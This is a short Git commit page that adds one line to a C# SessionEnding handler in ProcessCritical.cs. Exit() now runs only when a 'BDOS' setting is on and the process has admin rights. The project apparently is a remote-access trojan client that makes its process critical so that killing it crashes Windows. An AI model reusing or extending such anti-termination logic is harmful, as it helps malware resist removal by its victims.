Update ProcessCritical.cs
This commit is contained in:
parent
ce53554a7b
commit
901ea4ab82
@ -11,6 +11,7 @@ namespace Client.Helper
|
||||
|
||||
public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
|
||||
{
|
||||
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
|
||||
Exit();
|
||||
}
|
||||
public static void Set()
|
||||
|
Loading…
x
Reference in New Issue
Block a user